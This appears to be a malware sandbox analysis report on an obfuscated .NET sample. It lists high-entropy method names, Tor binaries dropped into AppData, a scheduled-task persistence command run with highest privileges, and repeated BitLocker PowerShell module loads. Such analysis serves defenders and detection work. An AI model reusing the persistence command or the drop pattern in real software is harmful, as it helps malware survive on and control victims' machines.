Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, nKKY7Tt52faTCddFBg.cs	High entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, JMKYPcVyVq6QH7wK0M.cs	High entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, vQhmVZmG0JZtewW47V.cs	High entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, wShyhrkNG0qWJND3Sv.cs	High entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, G3L0NIMHLFjsoLjt29.cs	High entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, KoO1A80rKYoteG0Jem.cs	High entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, wqc7bO7TnM3ZX08JehS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, nlGFpdxwrdyqFjguXl.cs	High entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, AdPDqvax914xQbRvHH.cs	High entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, asEp2FfC6uaqQkU7N03Xi7aMe7aH4UsqyvczX1pV8VNDEBWL6.cs	High entropy of concatenated method names: 'j9pYh7fqUtxAzfvnbuJUiOYCEky35MZza4ejy2YYNk96bR44B', 'q1AkQ9L5Ua31gmqDu5aPF3y22uEixfb6ZlGjhoexTZd0qLmZh', 'XXD17AbScLYXpeQx98rahzkAsurbeSScr7tDFtieaoG0hQF5K', 'KL3JvinUZD63lB8cBE5fll4PbD', 'hYodKkMjQwXPC9IRhVwgMwm9D5', 'M56aYRhAnyH1lN7hW7LmazOpIC', 'xtOX9br7PfuNPsxA9oqCuKteVy', 'SSi8CSEb2hT4pPBGrikeSsnWAQ', 'zHefGITeBicsks60NE9F5AYnfi', 'qldqlcyo8chVirjGfIBaIl2z2k'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cs	High entropy of concatenated method names: 'ieoX6VrIxwtQ0f6IPxj01vCOfctxZ5l6ZE0NvjtWknPtwpRYdYVzrRYWzPIGg8WIpwMdndemoXhCbI312', '_38BK1I5SoyOeEOjEuO7IxVars2OjcCgHsEjdqW3FfcNI2nSdSoA6Ny145ZLv2Y3QgnwJUsVZr65zqEbwl', '_86Z1aL9PQfmCZRDJ4oCkARjvaFgfIzRELcAJ1Nc2Iya8HtkxUzVCRA51ZAwGkCudIKGTEzLPQ8p5E1aJL', 'Mps3WRSJwGfNLmVfvSnuZNM6KiMx9FTS0JuyrnTow0MedbgjopKaGEuXs8Qd6ua0ITPnSn0i4FjTd2utM'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, RHrnabkqggf8x5IBqT2LD4ylWiCt2ceO1BQW7adWJ6d509VvOr5xQjaZtlyl9w24v2t1BcynkEhMKVNrepe12LKHR.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'AmkRhiq4pVi2iBvBtP2Bwybsvw65KyK3nCe2860OnGUeTrID2BvBcIVUop8t2pCQvdZOFbzoqsT8FrjSv', 'nJI63nP0qabprjzbDKLQTo24cK9H5b9buvOuCJHijpfhJxmY3YhhQJN2VvGF49INiiJZJkXYitl4O0M8f', '_8srhG0pKEeotPLJFpLjfJZfJIBLhT6CIGM5JqaWtOsFmkiSNqU3ceC9ZHGaCZxsYf5CHU5wwo5s5AElzL', '_6SZXnXIgpwUuaKA1cu8jnBIxvt2YcOEh500Uas57Q5zd2UXkdXEZZatZP9tV5tPpLuTtJNujdJ8bTSYhR'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	High entropy of concatenated method names: 'qUJlaYtxtF3DbhjY', '_99flffu2gimXsrEvebANqrnCeLyGXDPlUR2jFNroY7z0SkWIpjEoL9v1wLRRFYStaERNXiDzM7KYmJrepx36sjnte70k7yL9GR', 'HOwVothBZbpt3MhCNzc7vZd4HU9mMZAhgshlneBdv2h5ZbK9DFVm3a2qSrciZ0OwL8Oot59rmHBc6yFuLEOTTygwL43snDyxD6', 'YlFRwAvV4R41VmGHmOT32RhVbtjp7b27d3dxRiFkqlcbCluFZexiefjrnsuljXYiTSB9yEbjVHaDopCdVjsydlt8udD1Sk5pmK', 'jcnMb4QQhDa5eCURI8L9eKMDayfrk94eDSxDyXY75Sxcgu1P5dwYXn8DvDfYnXcmvhNdVZSEprhGsDr7cLdf0KQEFyVB0nTWYy'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	High entropy of concatenated method names: 'bE6Skcym1E8q1JpQvrrx3A2mPNyEYmA', '_48a39vrGguHmHwaVwCYAXZzl4LFopMc', 'KCB2eIA3VC5QdcTQ7vcWdKgaQ7sBGeN', 'sfRlsl7nZqZfuf0SM1QN7yUx75H53Rh', 'XqXnqcxyHckdUfZccMZiGWEtvihJFaC', 'CumF6z080eUonkPpjiEt8hXsb7DITXb', 'n1xP1ZOmmaiWJwC1ugklwqoJ9HSjjAZ', 'kwM3uET4iWbN6eslWcLIYG7tJxzzeK0', 'Xff0w9u7Bfzj323rrg1udqMDCrc859R', 'Hv0sdAhGuJ7WgE8AEe4vW19hUFftosp'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	High entropy of concatenated method names: 'L5f6jbsrgh8yYymy', 'ggsKYphZwRQlM9am', 'Ph8AevJTp2T7ku20', 'IZCHUE2BDP769cUK', '_30rMMePn4gqbT3MH', '_6HZ8rTmwlKI6LdOE', 'r6MU5kcfW4EjU7lv', 'dCKW9WrLdnh9EaZV', 'cCVgQOQCfSUo347X', '_46XjgzRDLUSXjJjo'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, 46Vktqg7CAqVoJ3pXlNy6niu94YrpPriQQA765ga1y8jmqBJ9nrC0PNeoqVxX5rB8GTaZOIbxholzAhW49uLNc62H.cs	High entropy of concatenated method names: 'QS5snepBdQqcCOHSQp7wjYIBy9LdLD9JeyjCxuIbYWVwJ8jOguYWzcEYOC4LkBruRMAZhszhYztkH84KxhUkBmDzV', '_8VMPhDzpud4K0D4TquEusHJXknWPp7fke5kLaX1wtC0z6RrzbmqhggU9TgpCzBalnWms12hoRs1GdRw6jJwpKDU0Q', 'YBwBC1vWAUZiHjfk8nlWB5TcSRA3oPClfq6cPLrfFkoZD0CwZLN6fcGYrg2DOmIWL8fXIbXVLEWwreT4mJumY5zT7', 'zSUF79XylEJaKsEdJqtLmyb0MSbrsRFB8XsPazAu1IuUs2ZXHZkJGI31Vr4YG4yWGX1UfDD2SFJAv7sVINYQS9IW4', 'nqyYJVzhH9i1KcWmyuaLVZXlO6uZcbtvsbE9b2Y0AKTbQisK6v8LvtwrKfkcKfpCz3z567Dtj9DC5UsxsdkEN6ava', 'dCvu9PJyf7MfVS1Npc3fjhG4LSnT13v7ZN2PeUNDI9POEyjyIRUvYcaF3ABpvbu33ocVz90ihZhBEfF5BN74LMJSJ', 'JT9wDkQa6v6BdWcpbWa9WMRL3vomRHBYI0vfMhCmDg6lI1Ww2tVtA3m7AzfQA8flQbppxXKI3INXriEyYsqCUqVSq', 'SqFODOrdzvoFFQEH3vzqJpRU1o5IAywpH5Vy0K3IWfcxtEZpgEmkrLtqIsjRSB9QFq7ByCwUKbdO9S9hhRn7HeYHX', 'pGosDhHzyNeePTKPyTwr9m1xQ7KPu7GqfgyuwDSXCMZXF9hdeckF9CRPraIcI2VjcsGqlCzItThdntkZfUi85xgYx', 'KVcOKWHq70Jo70xfPEvBXDyLWzeapKnSm6ZqpwSQo4jmCd3aG92qkTHeMx612ghHxliNVcFiSakEsgUs2CX9VXuqS'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, IklJR9Egrci7AkoDGmrtlQz9KpfApOw.cs	High entropy of concatenated method names: 'Poc96CYK8OSv52z26hmXZfOp7tWv8TF', 'ExuBL3pMYZSl9913WmNbxDZhYMOjBN6', 'ecPnLK2QepjkslfNCNM1nmU9Zaz6qQu', 'rOn9thVJbMyWyrQ7urXne23OOfLKV2DnfdDEKYSs33EFmusn9TAHdExLeOqe0WnzQ0W3yUxX3hlrORKwlSbnSbxfYxFny93zD2', 'n1Kt8jjnVKwMzP4XvhIWNdjNoiHo380FoO5AfnzYBQsb2S5BSVVwbEgpADjXymXkk2K5MFA1JwtoQOkD2maMetNhc4ey4z0sra', 'bNvU1zkRVYVglK41nyb6EyKDl0mRGa5rSs56jXXGb5FkVeHpLeAaWAX3uXAbHPkPKIXiAkmCO5YJNWmTBPOmEEmQvsRvVEAT3J', 'EaUqAvoIBKIqK7lROQeEZKTApSVnfkl3jzK0Gs3HoXgVMEZssVglXUsgK8TOUzDwElRPPqWHnWsQlL2JNoOtI4Oo16AdBQ5lPa', 'GWSgsyBxh2AdxW4HIL87cGlfJCD1VRlsSaUSET9aSS7BZJXNTWSzviaSJHzSRN2HATJlo9RkRUlsrN32NWN0oocgt12kBeBEIN', 'dQojCAMlnWTBRn4ep59rv6Yy8JDR8lKfOz8mGgStmHyugnuDELiXXOy98H1uqD69PCfzjXK5L7IvLA9RXX6r9f4YruF6Ylwfgc', '_9Q0ogs17qwzhJbUyXr16HTr3BRGn4QvnoHycknKeIUDOFNZVnxlnQr5ljgSNWmkKwKTVjpEqIiDYjAKNpdwaApjPDu4jGxpZL5'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs	High entropy of concatenated method names: 'f6umHbcSKUEeCW91ooOAfJl9PjsmMaH', 'wkAIiThNH8epac4Ok3Gy0sk1E1UyokG', 'mJQi8aQlYBH680bsbDAcLkSWUticyzq', 'YDaJPmh0IV3zBUCXDBCT901fLwqEdOm', '_5MZAwH4gj3KSlo2yJJoL5thDudhywuf', 'gha1t9V6cwzsPueRtGncNgrVjVWduZI', 'RmzNMxHPsPlMoCYGw4xljeH3pUmG1D1', 'vKORDnbaXqyihIjqVcVn6FuJuirt36x', 'e0socU8SbuUz6ZcaJsyGEJcP8BpPuea', '_9kxN9kzg5bQyCJ2LwwMR8FggoKWuSzf'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, rlPW4lL6JzpBKG5uTpUgtMKAdxQudep.cs	High entropy of concatenated method names: 'kBIJXv5a6rottIG83i4vMNxD8FeQAsJ', 'UXPzojRBKx1Oqz9xM4hqjeBMRGFhilZb0DpPekrUZrUFBwX4Z6QKRfIR8Q6VLG5yCxn4FdHJAk7DF12DySdVEngK8AbS6420Ua', 'N93RaNm3kVfs5sBwuxwa1snrEURzE4gpyKg3PFeRmsWQ9grkjjjD6u8KC4NOAbTgcEFuj1CrJWLrxbiBtYbrDDtY1SSUUupQr9', 'XGroXQIR91D3l4CCUv1lCuJWuRjTdcWOzPqUdCqRyHMdqmHUR0ueHXMI2rBwVL1VXstJIcfgV1hQJu7FIn7U6ueRyPjsNM3EI2', 'BqnIh4cGt3g5rOqBfzaULbx9adX0obHUPSD6WWd285Qc4G9Lax9PXlcBSFQtHOvaF5dDdTN9DNl6QLUPu8fh16LhQmfiOzzPBt'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, MoLs8m78ESt4YD6gORW.cs	High entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, FNiqGIzN6YouuO6eE2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, LjKFJcGnQbFpADmDEj.cs	High entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, h82OGR39MMrSWBIeuA.cs	High entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	High entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, NbgqbDZfxTd3FhSpvT.cs	High entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, zdH4f3pZmi7p2yCYxr.cs	High entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, oXGlh9FSyLkQpmpfLu.cs	High entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, olC9lOqWPHK88HFMTE.cs	High entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, dsMWdeSqEmuJJIBpLr.cs	High entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	High entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, nKKY7Tt52faTCddFBg.cs	High entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, JMKYPcVyVq6QH7wK0M.cs	High entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, vQhmVZmG0JZtewW47V.cs	High entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, wShyhrkNG0qWJND3Sv.cs	High entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, G3L0NIMHLFjsoLjt29.cs	High entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, KoO1A80rKYoteG0Jem.cs	High entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, wqc7bO7TnM3ZX08JehS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, nlGFpdxwrdyqFjguXl.cs	High entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, AdPDqvax914xQbRvHH.cs	High entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'

Drops PE files

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	File created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Jump to dropped file
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	File created: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
